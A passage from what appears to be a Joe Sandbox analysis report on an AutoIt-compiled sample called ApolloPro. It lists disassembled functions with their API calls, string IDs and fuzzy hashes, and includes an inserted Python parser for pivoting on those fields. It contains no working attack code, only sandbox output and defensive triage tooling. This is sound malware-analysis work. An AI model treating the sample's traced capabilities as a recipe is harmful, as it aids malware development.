                                                                                              • Instruction Fuzzy Hash: 69E194B1900219AFDF219F65CC84EFE7BBAEF05710F10815AFA15AA291D7708AC5DF60
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 006B5007
                                                                                              • GetDesktopWindow.USER32 ref: 006B501C
                                                                                              • GetWindowRect.USER32(00000000), ref: 006B5023
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006B5085
                                                                                              • DestroyWindow.USER32(?), ref: 006B50B1
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006B50DA
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006B50F8
                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006B511E
                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 006B5133
                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006B5146
                                                                                              • IsWindowVisible.USER32(?), ref: 006B5166
                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006B5181
                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006B5195
                                                                                              • GetWindowRect.USER32(?,?), ref: 006B51AD
                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 006B51D3
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 006B51ED
                                                                                              • CopyRect.USER32(?,?), ref: 006B5204
                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 006B526F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                              • String ID: ($0$tooltips_class32
                                                                                              • API String ID: 698492251-4156429822
                                                                                              • Opcode ID: 302127302245bd3b01d2a6cedfdb96c3fbbd6641bc15f7610c2cf5f27ec83401
                                                                                              • Instruction ID: 1aab654bf4eb10ec3636c2647c0731e40aeb4ab480d9cda888870eb79c006835
                                                                                              • Opcode Fuzzy Hash: 302127302245bd3b01d2a6cedfdb96c3fbbd6641bc15f7610c2cf5f27ec83401
                                                                                              • Instruction Fuzzy Hash: E7B1AEB0604740AFD744DF64C844BAABBE6FF88314F008A1DF59A9B291DB71EC45CB96
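As an added aid for working with function blocks like the ones above (example code written for this page, not part of the Joe Sandbox report or of Joe Sandbox's own tooling): a small Python parser that turns the "APIs / Memory Dump Source / Similarity" blocks into records, strips the "Download File" link residue that the HTML export leaves on the Associated lines, and lets an analyst pivot on the String ID and imported-API fields, for instance to locate the function carrying the drive-bus-type strings (ATA, USB, Virtual, FileBackedVirtual) or every function that calls a given import. The sample input is constructed from two trimmed blocks in the same layout, and the helper names are my own.

```python
import re
from collections import defaultdict

# Constructed sample: two trimmed function blocks in the report's layout
# (the first mirrors the GetDriveTypeW block above; the second is shortened).
SAMPLE = r"""
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0069B361
• GetDriveTypeW.KERNEL32(?,006C2C4C,?,\\.\,006C0980), ref: 0069B43E
• SetErrorMode.KERNEL32(00000000,006C2C4C,?,\\.\,006C0980), ref: 0069B59C
Strings
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$CDROM$FileBackedVirtual$Fixed$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 1507b621099f62de135c37858735a16af5049f015d463fc95c57c715ce61e14b
• Instruction ID: 3275164797a3af913ccc058af86febee90fd3bbd658e04c6294234fc2030bb64
• Opcode Fuzzy Hash: 1507b621099f62de135c37858735a16af5049f015d463fc95c57c715ce61e14b
• Instruction Fuzzy Hash: 8C51BC30B41309DBCF00DF21DBC19BD77EBAB44B40B26A019E406A7A91D775AE82DB55
APIs
• GetDesktopWindow.USER32 ref: 006B501C
• _memset.LIBCMT ref: 006B9267
• SendMessageW.USER32(?,00000412,00000000), ref: 006B526F
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
Similarity
• API ID: MessageSendWindow$Desktop_memset
• String ID: tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 302127302245bd3b01d2a6cedfdb96c3fbbd6641bc15f7610c2cf5f27ec83401
• Instruction Fuzzy Hash: E7B1AEB0604740AFD744DF64C844BAABBE6FF88314F008A1DF59A9B291DB71EC45CB96
"""

# "• Name.MODULE(args), ref: ADDR"  or  "• Name.MODULE ref: ADDR" (no argument list)
API_RE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Key: value" lines under Memory Dump Source / IDA Plugin / Similarity
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
LINK_RESIDUE = "Download File"  # link text fused onto Associated lines by the HTML export


def parse_blocks(text):
    """Split report text into per-function records: API calls plus key/value fields."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":            # every function block opens with this header
            cur = {"apis": [], "fields": defaultdict(list)}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m["name"], m["module"], m["ref"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            value = m["value"].strip()
            if value.endswith(LINK_RESIDUE):
                value = value[: -len(LINK_RESIDUE)].rstrip()
            cur["fields"][m["key"].strip()].append(value)
    return blocks


def string_ids(block):
    """The '$'-separated String ID set. Caveat: a literal '$' inside a string is ambiguous."""
    raw = block["fields"].get("String ID", [""])[0]
    return {s for s in raw.split("$") if s}


def find_by_strings(blocks, wanted):
    """Opcode IDs of functions whose String ID set contains every marker in `wanted`."""
    wanted = set(wanted)
    return [b["fields"]["Opcode ID"][0] for b in blocks if wanted <= string_ids(b)]


def api_index(blocks):
    """Map 'MODULE!Api' to the set of Opcode IDs of functions that call it."""
    idx = defaultdict(set)
    for b in blocks:
        for name, module, _ref in b["apis"]:
            idx[f"{module}!{name}"].add(b["fields"]["Opcode ID"][0])
    return idx


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    print(len(parsed), "function blocks")
    print("drive-type probe:", find_by_strings(parsed, ["Virtual", "FileBackedVirtual"]))
    print("callers of KERNEL32!GetDriveTypeW:", api_index(parsed)["KERNEL32!GetDriveTypeW"])
```

Feed it the text of a whole "Execution Graph" / function-list export and the Opcode ID and Instruction Fuzzy Hash fields become stable pivots across samples of the same AutoIt stub; the String ID split is a heuristic, since the report does not escape a `$` that occurs inside a string.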
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0069499C
                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006949C2
                                                                                              • _wcscpy.LIBCMT ref: 006949F0
                                                                                              • _wcscmp.LIBCMT ref: 006949FB
                                                                                              • _wcscat.LIBCMT ref: 00694A11
                                                                                              • _wcsstr.LIBCMT ref: 00694A1C
                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00694A38
                                                                                              • _wcscat.LIBCMT ref: 00694A81
                                                                                              • _wcscat.LIBCMT ref: 00694A88
                                                                                              • _wcsncpy.LIBCMT ref: 00694AB3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                              • API String ID: 699586101-1459072770
                                                                                              • Opcode ID: 19df376b516524df28e5bb1105c5f9ec035f88f5e07bf8fc68ca16de77f4629a
                                                                                              • Instruction ID: 088693e61805d47a3f4ec910ec753991fccf186651240847819ed485145281f6
                                                                                              • Opcode Fuzzy Hash: 19df376b516524df28e5bb1105c5f9ec035f88f5e07bf8fc68ca16de77f4629a
                                                                                              • Instruction Fuzzy Hash: 87414572A40315BAEB55B7349C43EBF776EDF42761F00005DFD04A6282EF34DA0686A9
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00632C8C
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00632C94
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00632CBF
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00632CC7
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00632CEC
                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00632D09
                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00632D19
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00632D4C
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00632D60
                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00632D7E
                                                                                              • GetStockObject.GDI32(00000011), ref: 00632D9A
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00632DA5
                                                                                                • Part of subcall function 00632714: GetCursorPos.USER32(?), ref: 00632727
                                                                                                • Part of subcall function 00632714: ScreenToClient.USER32(006F77B0,?), ref: 00632744
                                                                                                • Part of subcall function 00632714: GetAsyncKeyState.USER32(00000001), ref: 00632769
                                                                                                • Part of subcall function 00632714: GetAsyncKeyState.USER32(00000002), ref: 00632777
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,006313C7), ref: 00632DCC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                              • String ID: AutoIt v3 GUI$hl
                                                                                              • API String ID: 1458621304-441625812
                                                                                              • Opcode ID: 594052b9b095f1b2912d41fed98230667196fad79737c2ed2c03ccd56b1ffa80
                                                                                              • Instruction ID: 205186846876034aae03b9031b8c366817ec024ab5555e35099d476cecfbe516
                                                                                              • Opcode Fuzzy Hash: 594052b9b095f1b2912d41fed98230667196fad79737c2ed2c03ccd56b1ffa80
                                                                                              • Instruction Fuzzy Hash: 5BB14B71A0020AEFDB14DFA8DD59BFE7BA6FB08310F105129FA15A7290DB74A851CB94
                                                                                              APIs
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • GetForegroundWindow.USER32(006C0980,?,?,?,?,?), ref: 006504E3
                                                                                              • IsWindow.USER32(?), ref: 006866BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Foreground_memmove
                                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                              • API String ID: 3828923867-1919597938
                                                                                              • Opcode ID: 8735f8dfcf5d7ee9efe73b70b4ba9b1c934e1bee35bb3ac41d53b3f34ab6131e
                                                                                              • Instruction ID: b476c7d1d4205d10135c78b704c2bb2ac4a003e7d2d7567a3f281baf766b8573
                                                                                              • Opcode Fuzzy Hash: 8735f8dfcf5d7ee9efe73b70b4ba9b1c934e1bee35bb3ac41d53b3f34ab6131e
                                                                                              • Instruction Fuzzy Hash: A0D1D230104242DBDB44FF60C9919AABBB7BF55348F104B1DF856472A2DB30F99ACB96
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 006B44AC
                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006B456C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                              • API String ID: 3974292440-719923060
                                                                                              • Opcode ID: 553e63cecf1a562040b6e41cb32934ed0cb212858beae6a8196ead56c2ba8732
                                                                                              • Instruction ID: e4928d6185fb5c44a1903b10d8bb1b7512e5a9d43eb5191be7b0ee003ecac31d
                                                                                              • Opcode Fuzzy Hash: 553e63cecf1a562040b6e41cb32934ed0cb212858beae6a8196ead56c2ba8732
                                                                                              • Instruction Fuzzy Hash: CEA17D702143419BCB54EF24C951AAAB7A7EF85314F10496CF8A69B3D2DF30EC4ACB95
                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 006A56E1
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 006A56EC
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 006A56F7
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 006A5702
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 006A570D
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 006A5718
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 006A5723
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 006A572E
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 006A5739
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 006A5744
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 006A574F
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 006A575A
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 006A5765
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 006A5770
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 006A577B
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 006A5786
                                                                                              • GetCursorInfo.USER32(?), ref: 006A5796
                                                                                              • GetLastError.KERNEL32(00000001,00000000), ref: 006A57C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                              • String ID:
                                                                                              • API String ID: 3215588206-0
                                                                                              • Opcode ID: 6736ffcdfbb0fbc2a649fe596a6de8c23de277cc89051c206571c614bc4c18d1
                                                                                              • Instruction ID: a03ad58cc40dc69a04150dd2e89d09d4c62bc079bda3e0991b6a0fcff622a7a6
                                                                                              • Opcode Fuzzy Hash: 6736ffcdfbb0fbc2a649fe596a6de8c23de277cc89051c206571c614bc4c18d1
                                                                                              • Instruction Fuzzy Hash: 63416670E04319AADB509FB68C49D6EFFF9EF51B10F10452FE509E7290DAB8A801CE91
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0068B17B
                                                                                              • __swprintf.LIBCMT ref: 0068B21C
                                                                                              • _wcscmp.LIBCMT ref: 0068B22F
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0068B284
                                                                                              • _wcscmp.LIBCMT ref: 0068B2C0
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0068B2F7
                                                                                              • GetDlgCtrlID.USER32(?), ref: 0068B349
                                                                                              • GetWindowRect.USER32(?,?), ref: 0068B37F
                                                                                              • GetParent.USER32(?), ref: 0068B39D
                                                                                              • ScreenToClient.USER32(00000000), ref: 0068B3A4
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0068B41E
                                                                                              • _wcscmp.LIBCMT ref: 0068B432
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0068B458
                                                                                              • _wcscmp.LIBCMT ref: 0068B46C
                                                                                                • Part of subcall function 0065385C: _iswctype.LIBCMT ref: 00653864
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 3744389584-679674701
                                                                                              • Opcode ID: 28c9442d2c4555fb6a6a7c2387d46a85e06ec64b8dc443f31ebf0b953b831a9a
                                                                                              • Instruction ID: 027c073c6036eb22bf76c5e0d22f12b4a285339e6169f7cd3f877f3a921cd052
                                                                                              • Opcode Fuzzy Hash: 28c9442d2c4555fb6a6a7c2387d46a85e06ec64b8dc443f31ebf0b953b831a9a
                                                                                              • Instruction Fuzzy Hash: 43A1F071204306EBD714EF60C885FEAB7EAFF48350F005629F999D2291DB30EA55CB90
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0068BAB1
                                                                                              • _wcscmp.LIBCMT ref: 0068BAC2
                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0068BAEA
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0068BB07
                                                                                              • _wcscmp.LIBCMT ref: 0068BB25
                                                                                              • _wcsstr.LIBCMT ref: 0068BB36
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0068BB6E
                                                                                              • _wcscmp.LIBCMT ref: 0068BB7E
                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0068BBA5
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0068BBEE
                                                                                              • _wcscmp.LIBCMT ref: 0068BBFE
                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0068BC26
                                                                                              • GetWindowRect.USER32(00000004,?), ref: 0068BC8F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                              • String ID: @$ThumbnailClass
                                                                                              • API String ID: 1788623398-1539354611
                                                                                              • Opcode ID: 1c8f135e9c8e9e4ba30042ea3d68fe0936275b4bb9003f379c5c8e0254d74ac6
                                                                                              • Instruction ID: 60f210c0b6bcba4a9e05e331ee8f1b965d1bfef375d9d1b062c8273a75bb16e2
                                                                                              • Opcode Fuzzy Hash: 1c8f135e9c8e9e4ba30042ea3d68fe0936275b4bb9003f379c5c8e0254d74ac6
                                                                                              • Instruction Fuzzy Hash: EA81B1710043059BDB14EF14C885FAA77EAFF44314F04A669FD899A196DB30DD4ACB61
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                              • API String ID: 1038674560-1810252412
                                                                                              • Opcode ID: 9868b8aec07632e0420895a0d3c59f8a33e92e8fef348b84258bea6b0c6abb4c
                                                                                              • Instruction ID: 0cc079fad9d7758a3b81f3bd9058b12825bf1c400378652656406989a2f4e2af
                                                                                              • Opcode Fuzzy Hash: 9868b8aec07632e0420895a0d3c59f8a33e92e8fef348b84258bea6b0c6abb4c
                                                                                              • Instruction Fuzzy Hash: 2B31E030A41305A6CF14FBA1CD53EED77A7AF23790F210228F941B51D2EF656E04865A
                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000063), ref: 0068CBAA
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0068CBBC
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0068CBD3
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0068CBE8
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0068CBEE
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0068CBFE
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0068CC04
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0068CC25
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0068CC3F
                                                                                              • GetWindowRect.USER32(?,?), ref: 0068CC48
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0068CCB3
                                                                                              • GetDesktopWindow.USER32 ref: 0068CCB9
                                                                                              • GetWindowRect.USER32(00000000), ref: 0068CCC0
                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0068CD0C
                                                                                              • GetClientRect.USER32(?,?), ref: 0068CD19
                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0068CD3E
                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0068CD69
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                              • String ID:
                                                                                              • API String ID: 3869813825-0
                                                                                              • Opcode ID: c470018a29956a2f1f94167e2259e0cd6773c0ea2126b1c8f1c2df6928d4ac66
                                                                                              • Instruction ID: 40bda56768df5732b6f1675f073ae682f81e605178c1a5f8b1f9d9e675def110
                                                                                              • Opcode Fuzzy Hash: c470018a29956a2f1f94167e2259e0cd6773c0ea2126b1c8f1c2df6928d4ac66
                                                                                              • Instruction Fuzzy Hash: 12515170900709EFEB20EFA9CD85FAEBBF6FF04715F004619E546A26A0C775A954CB50
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006BA87E
                                                                                              • DestroyWindow.USER32(00000000,?), ref: 006BA8F8
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
